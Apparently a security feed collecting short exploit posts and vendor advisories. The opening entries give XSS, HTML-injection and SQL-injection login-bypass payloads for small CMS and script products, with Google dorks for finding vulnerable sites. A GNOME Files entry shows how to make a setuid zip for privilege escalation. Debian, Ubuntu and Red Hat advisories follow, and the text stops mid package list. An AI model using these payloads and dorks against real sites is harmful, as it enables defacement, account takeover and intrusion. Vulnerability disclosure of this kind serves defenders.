DevSoft Arge Bilişim CMS version 1.0.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : DevSoft Arge Bilişim CMS V1.0.0 XSS Vulnerability                                                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : https://devsoft.com.tr/                                                                                              |  | # Dork      : intext:''Web Yazılım: Devsoft''                                                                                      |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /urunler.php?id=90'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/adabrokercomtr/urunler.php?id=90%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DevSoft Arge Bilişim CMS 1.0.0 Cross Site Scripting

Desenvolvido Buscazip Guiaking CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Desenvolvido Buscazip Guiaking CMS v1.0 XSS Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://buscazip.com.br/                                                                                           |  | # Dork      : intext:Site desenvolvido por Buscazip, Guiaking Empresas                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload :  /imovel.php?id=22'<script>alert(/indoushka/);</script>[+] https://ariquemes190combr/imovel.php?id=22%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Desenvolvido Buscazip Guiaking CMS 1.0 Cross Site Scripting

Deprixa version 3.2.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Deprixa 3.2.5 Authentication Bypass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/                       |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin'-- - & pass=1612186 [+] https://127.0.0.1/deprixalogisticsonline/dashboard/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Deprixa 3.2.5 SQL Injection

Datoo Complete Dating Script version 1.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Datoo - Complete Dating Script v1.0 HTML Inject Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html                                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] create a new use and after login go messages and paste html code .[+] use payload : </tr>    <td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a></tr>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Datoo Complete Dating Script 1.0 HTML Injection

Debian Linux Security Advisory 5471-1 - A security vulnerability has been discovered in libhtmlcleaner-java, a Java HTML parser library. An attacker was able to cause a denial of service (StackOverflowError) if the parser runs on user supplied input with deeply nested HTML elements. This update introduces a new nesting depth limit which can be overridden in cleaner properties.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5471-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
August 07, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libhtmlcleaner-java  
CVE ID         : CVE-2023-34624

A security vulnerability has been discovered in libhtmlcleaner-java, a Java  
HTML parser library. An attacker was able to cause a denial of service  
(StackOverflowError) if the parser runs on user supplied input with deeply  
nested HTML elements. This update introduces a new nesting depth limit which  
can be overridden in cleaner properties.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.24-1+deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.26-1+deb12u1.

We recommend that you upgrade your libhtmlcleaner-java packages.

For the detailed security status of libhtmlcleaner-java please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libhtmlcleaner-java

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmTRTEhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeQfTxAAwDzh+g/pObARsJwiLjNHxgYZCE0QEdA1jlcs94WnYTEJ08RRcismUnTu  
BE/hxwUBsRwd3oV1zdgj3NzXgI8XFOUVeL1jUNAQ7XKb7VpaHd1NzQ4svxs32IsN  
7C3yhvCpUwTsC/8dw6H//O2uaymARsUIQSbZ5ZirwslsYNcCRWIFgEEEhv38E6QL  
e+lwog5X90fhHwfE1i6GUeSPyijHtwhxo6THNnw1evctPgOX5vj06qpo4y6I2WYU  
rbAjtALeO3o4UxGmCHs2KtrSnt2QoKcbxfjspgdGzvTpTnbwrseOD1mrq9EYNgUK  
P+iQ81z7KKcqMASEy9ZTcRbzhCgYHb2IKD5iPxSj0Jf0f2kDN0qehoExlHnnmSoR  
SqauVYYGQ38R+7DkWZeI6fkERFNJd8ff3dEk6D+4s+Ad4X7CzMq+SxajwFYogEhq  
QTd/3fhIef+eZVkHw96AVvd+dmYvOo+hcE/VjGckbJIIAnc0EXJEPw+JdYjoAr/t  
Zq1998FbRovvLB5xlmsL6YXe8TYFRyiYuMmRYguWk/UnKx5On673QvIImQUVqD2V  
euVh6+xoY6z1ELGH+SGz29FWUh17LPsQ24VhHZ4wpGZVOpFLCWYJo4WV2fx5HQa9  
8G9YgCojURtzYItR3oh1/3/DMN1ZSg0Nsy50fshx4qtcarq6VhI=  
=QxO1  
-----END PGP SIGNATURE-----

Debian Security Advisory 5471-1

Ubuntu Security Notice 6277-1 - It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. It was discovered that Dompdf was not properly validating processed HTML content that referenced PHAR files, which could result in the deserialization of untrusted data. An attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6277-1August 08, 2023php-dompdf vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Dompdf.Software Description:- php-dompdf: HTML to PDF converterDetails:It was discovered that Dompdf was not properly validating untrusted input whenprocessing HTML content under certain circumstances. An attacker couldpossibly use this issue to expose sensitive information or execute arbitrarycode. This issue only affected Ubuntu 16.04 LTS.(CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced PHAR files, which could result in the deserializationof untrusted data. An attacker could possibly use this issue to executearbitrary code. (CVE-2021-3838)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced both a remote base and a local file, which couldresult in the bypass of a chroot check. An attacker could possibly use thisissue to expose sensitive information. (CVE-2022-2400)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:php-dompdf 0.6.2+dfsg-3ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.2+dfsg-3ubuntu0.18.04.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.1+dfsg-2ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6277-1CVE-2014-5011, CVE-2014-5012, CVE-2014-5013, CVE-2021-3838,CVE-2022-2400Package Information:https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3ubuntu0.20.04.1

Ubuntu Security Notice USN-6277-1

Red Hat Security Advisory 2023-4531-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4531-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4531  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-42896 CVE-2023-1281 CVE-2023-1829   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: Use-after-free vulnerability in the Linux Kernel traffic control  
index filter (CVE-2023-1829)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c  
2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-477_10_1-1-2.el8_8.src.rpm  
kpatch-patch-4_18_0-477_13_1-1-1.el8_8.src.rpm  
kpatch-patch-4_18_0-477_15_1-1-1.el8_8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-477_10_1-1-2.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_10_1-debuginfo-1-2.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_10_1-debugsource-1-2.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_13_1-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_13_1-debuginfo-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_13_1-debugsource-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_15_1-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_15_1-debuginfo-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_15_1-debugsource-1-1.el8_8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-477_10_1-1-2.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_10_1-debuginfo-1-2.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_10_1-debugsource-1-2.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_13_1-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_13_1-debuginfo-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_13_1-debugsource-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_15_1-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_15_1-debuginfo-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_15_1-debugsource-1-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-1829  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0lBGAAoJENzjgjWX9erESP4P/jnqyVZaZVNoh4SnkgLB6yOd  
4ZP5Edoan+KK7QlRFXKwiRw0LYmiX91jdmArtvpqq7Kb+M0d3wJovvTvsdladXhO  
AxAMKDlaPgbL23xKw2H92Y9h/XAJung9I8wHU7fRvA0aVCg5nBdvSavUDuMaVSss  
iEBmxk/SgU4aggQ8IL1ThtSLBot4bsHmC9KyBhvwRIdo3RufavGS3ddmYwuTVM8T  
gaXuAJACEM/0P3FJT3cktWaUtbLsmXkn+Hg/8eb3NU/ThjWboQvlUnGJtogWEXuc  
PyMDmYCrBrj3US8tptOL09WDGD1EgN7KiFr5ATmOrZfM8tyWCeVPxi3BMsx1rj10  
xlNO71OusjB5cWyoOzF4vSU6Y7aP5cnhcF1xjX1yH6jeUhzGngjNhvmljcUWD/R8  
UoqxzryLTooX2kjP/0/IJE7OXdSRsOk2J+uRqwTfJWiu6eTITaD6i32cdIRb2nbo  
lhhSqnDDueTqWIZcFxI6/oWmgOpdVlnnuq1Y6/4V/qxgj0zYUAdKU5U9b4oGxab9  
GLg2xbYlsHXVVYivO5XlfsEfVyL95V5MJjAnbxIH2GzDcL21JuZixMLcFn4DABpI  
13UQfQqpnrQBlnhPXdarDOzW7l/wZZ4YF0pjL/YFeDHwP8vlYbdRFeP0NkznUrVb  
a6sANxLJHVMiBVaeToa7  
=b9B9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4531-01

GNOME Files version 43.4 (nautilus) on Fedora 37 will extract zip archives with setuid files for other user identifiers that can be leveraged to escalate privileges.

    Affected: GNOME Files 43.4 (nautilus) on fedora 37Description:If an user A opens in GNOME files zip archive containing`setuid` file F, then F will be silently extracted toa subdirectory of CWD.If F is accessible by hostile local user B and B executes F,then F will be executed as from user A.tar(1) and unzip(1) are not vulnerable to this attack.Session for creating the ZIP.After that just open f.zip in GNOME files.<pre>[joro@fedora ~]$ umask0022[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F[joro@fedora 2]$ zip f F ; zipinfo fArchive:  f.zipZip file size: 155 bytes, number of entries: 1-rwsr-sr-x  3.0 unx        3 tx stor 23-Aug-05 12:38 F[joro@fedora 2]$ ls -ld /tmp/2/drwxr-xr-x. 2 joro joro 80 Aug  5 11:20 /tmp/2/[joro@fedora 2]$</pre>

GNOME Files 43.4 Privilege Escalation

Red Hat Security Advisory 2023-4456-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.8. Issues addressed include an add administrator vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.8 bug fix and security update  
Advisory ID:       RHSA-2023:4456-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4456  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-41723 CVE-2022-45869 CVE-2023-0458   
                   CVE-2023-1998 CVE-2023-3089 CVE-2023-3090   
                   CVE-2023-22652 CVE-2023-28321 CVE-2023-28322   
                   CVE-2023-28484 CVE-2023-29469 CVE-2023-32681   
                   CVE-2023-35788 CVE-2023-38408   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.8 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.8. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4459

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:a956488d295fe5a59c8663a4d9992b9b5d0950f510a7387dbbfb8d20fc5970ce

      (For s390x architecture)  
The image digest is  
sha256:9768dd5f5c79565da6e410de63429dc1b329a777d250047d37e474f70521c06e

      (For ppc64le architecture)  
The image digest is  
sha256:45a1e6f79a40ca205449936ba34c08cd4a1c4309453d85948ce91d7178a85be1

      (For aarch64 architecture)  
The image digest is  
sha256:c8f6f564d2f840cf7b8785ae5c0aaeef01017a258a85be50945dc003485b83f7

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-11016 - node_exporter shouldn't collect metrics for Calico Virtual NICs  
OCPBUGS-11091 - Custom build strategy cannot add configmaps as build input  
OCPBUGS-11498 - vsphereStorageDriver validation is misleading  
OCPBUGS-13310 - [infrastructure-operator] GitOps ZTP does not support enabling multi-node workload partitioning  
OCPBUGS-13641 - Users who can't list CatalogSources also can't initiate operator upgrades from the Subscription tab of the CSV details page  
OCPBUGS-14265 - Regression: OpenShift Console no-longer filters SecretList when displaying ServiceAccount  
OCPBUGS-14599 - log additional host info at warning level  
OCPBUGS-14711 - Agent based IPV6 only install fails when the RendezvousIP is not canonical  
OCPBUGS-15258 - openshift-oauth-apiserver metrics are not collected  
OCPBUGS-15290 - OpenShift Installer gets stuck while listing GCP projects  
OCPBUGS-15743 - Hypershift NodePool AllMachinesReady and AllNodesHealthy should have message conditions ordered  
OCPBUGS-15810 - The ExternalLink for ' OpenShift Pipelines based on Tekton' is incorrect  
OCPBUGS-15859 - [4.13] Rebase openshift/etcd to 3.5.9  
OCPBUGS-15973 - Sync stable branch for CPO release-1.26 into release-4.13  
OCPBUGS-15998 - Upload JAR file does not work if the Cluster Samples Operator is disabled  
OCPBUGS-16066 - No agetty issue messages are displayed on console  
OCPBUGS-16121 - [4.13] OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors   
OCPBUGS-16124 - IPI Azure internal (User Defined Routing) clusters create purposeless standard load balancer  
OCPBUGS-16158 - "Duplicate RoleBinding" leads to "Unsupported value" error  
OCPBUGS-16164 - LatencySensitive featureset must be removed  
OCPBUGS-16328 - Performance issue with systemd-coredump and container process linking 2000 shared libraries  
OCPBUGS-16335 - GCP: add me-central1 region to the survey as supported region  
OCPBUGS-16340 - Avoid retry of Network Policy event   
OCPBUGS-16390 - cannot set network type other than OVNKubernetes or OpenShiftSDN  
OCPBUGS-16434 - [Openshift Pipelines] Stop option for pipelinerun is not working  
OCPBUGS-16613 - Add admin acknowledgement in 4.13 for API removals in 4.14  
OCPBUGS-16622 - 4.13/4.14 MCDs do not work with FIPS enabled golang builders  
OCPBUGS-16673 - NetworkManager fail to read static network configuration  
OCPBUGS-16768 - Cluster Autoscaler Operator should inject unique labels on Nutanix platform  
OCPBUGS-16888 - Fail to apply machine-config during rhel node upgrade  
OCPBUGS-17069 - NTO: Address a race in rollback.go e2e test  
OCPBUGS-17120 - [release-4.13] 4.13.z FIPS build - HyperShift - pods crashlooping with API connection failures  
OCPBUGS-17163 - Fix for dnf-RHEL worker nodes breaks 4.12 -> 4.13 upgrades badly  
OCPBUGS-2758 - cluster infrastructure object is failing validation 

6. References:

https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-45869  
https://access.redhat.com/security/cve/CVE-2023-0458  
https://access.redhat.com/security/cve/CVE-2023-1998  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-22652  
https://access.redhat.com/security/cve/CVE-2023-28321  
https://access.redhat.com/security/cve/CVE-2023-28322  
https://access.redhat.com/security/cve/CVE-2023-28484  
https://access.redhat.com/security/cve/CVE-2023-29469  
https://access.redhat.com/security/cve/CVE-2023-32681  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0lA3AAoJENzjgjWX9erE5AgP+gOCpJUNAsNwbGQEMDCKQp9S  
ZW7RHflZScD76g9DG4FO1OVkmWoh5yMYA47+VVNkPIlqkGj23WR+FKTC+7/B+S+n  
gJafJL+wpcZlQ3dsfk/wqK06G+61GgQeAm1pjhoMF6FtGmGeTDMAr1DDsZIjEVyC  
Hr10dZGgVZF/8R0klUcrucyyy6lRFHX2XZO+2Ot/t+E1xfuK88N9YtzfiJtHUeo8  
AGGRyHGWI99BqCcw7KioUwaDhV3STSLYiQ2/s2CFTSQcY/D5xF3F7E7bAT4J99va  
FspuASyFmvDOMVF2sxpPW1UhXyQ49M5sWK4o+Ys1bbFtiEaSp8s76FVp9hq6BBNu  
dYCbatSPXSQ8PZ8J1aSXE3qA/cVz6kKvAUjTA0OIPNhJROG0drOrBLAjdSQDjCsL  
Z8mcPCwNkImMMJ/TU3sq/Ebd9n2UZxHDOTLrg3NBhMeAOlhQBmowaj25T/j0kRDb  
ZylEPzIFz7dQVbXTwhjp8vdr8BBiuc2Wv9zpSo+egIclaFR86qigwzgDHmIgNBu1  
EBgHU21zcPxdSyHRM36P4Hjdfso+KceY0bXpdKfJ7oVbwGi8YGPugQSnBSWZzhY/  
NvzizDTGdhbGc/IQJ46Wx5IRnT6Z5v30C/Of5u5hnd7tRgSTxBjIlAX7I3u7IltS  
/NedojcmUxOT20tErgb2  
=ATHB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4456-01

Red Hat Security Advisory 2023-4536-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. The package has been upgraded to a later upstream version: nodejs. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:18 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4536-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4536  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-30581 CVE-2023-30588 CVE-2023-30589   
                   CVE-2023-30590   
=====================================================================

1. Summary:

An update for the nodejs:18 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs  
(18.16.1). (BZ#2223630, BZ#2223631, BZ#2223632, BZ#2223633, BZ#2223635,  
BZ#2223642)

Security Fix(es):

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs:18/nodejs: Don't assume FIPS is disabled by default [rhel-8]  
(BZ#2223639)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223630 - nodejs:18/nodejs: Rebase to the latest Nodejs 18 release [rhel-8] [rhel-8.8.0.z]  
2223642 - nodejs:18/nodejs: Remove /usr/etc/npmrc softlink. [rhel-8] [rhel-8.8.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-18.16.1-1.module+el8.8.0+19438+94e84959.src.rpm  
nodejs-nodemon-2.0.20-2.module+el8.8.0+18432+27f188ac.src.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.src.rpm

aarch64:  
nodejs-18.16.1-1.module+el8.8.0+19438+94e84959.aarch64.rpm  
nodejs-debuginfo-18.16.1-1.module+el8.8.0+19438+94e84959.aarch64.rpm  
nodejs-debugsource-18.16.1-1.module+el8.8.0+19438+94e84959.aarch64.rpm  
nodejs-devel-18.16.1-1.module+el8.8.0+19438+94e84959.aarch64.rpm  
nodejs-full-i18n-18.16.1-1.module+el8.8.0+19438+94e84959.aarch64.rpm  
npm-9.5.1-1.18.16.1.1.module+el8.8.0+19438+94e84959.aarch64.rpm

noarch:  
nodejs-docs-18.16.1-1.module+el8.8.0+19438+94e84959.noarch.rpm  
nodejs-nodemon-2.0.20-2.module+el8.8.0+18432+27f188ac.noarch.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm  
nodejs-packaging-bundler-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm

ppc64le:  
nodejs-18.16.1-1.module+el8.8.0+19438+94e84959.ppc64le.rpm  
nodejs-debuginfo-18.16.1-1.module+el8.8.0+19438+94e84959.ppc64le.rpm  
nodejs-debugsource-18.16.1-1.module+el8.8.0+19438+94e84959.ppc64le.rpm  
nodejs-devel-18.16.1-1.module+el8.8.0+19438+94e84959.ppc64le.rpm  
nodejs-full-i18n-18.16.1-1.module+el8.8.0+19438+94e84959.ppc64le.rpm  
npm-9.5.1-1.18.16.1.1.module+el8.8.0+19438+94e84959.ppc64le.rpm

s390x:  
nodejs-18.16.1-1.module+el8.8.0+19438+94e84959.s390x.rpm  
nodejs-debuginfo-18.16.1-1.module+el8.8.0+19438+94e84959.s390x.rpm  
nodejs-debugsource-18.16.1-1.module+el8.8.0+19438+94e84959.s390x.rpm  
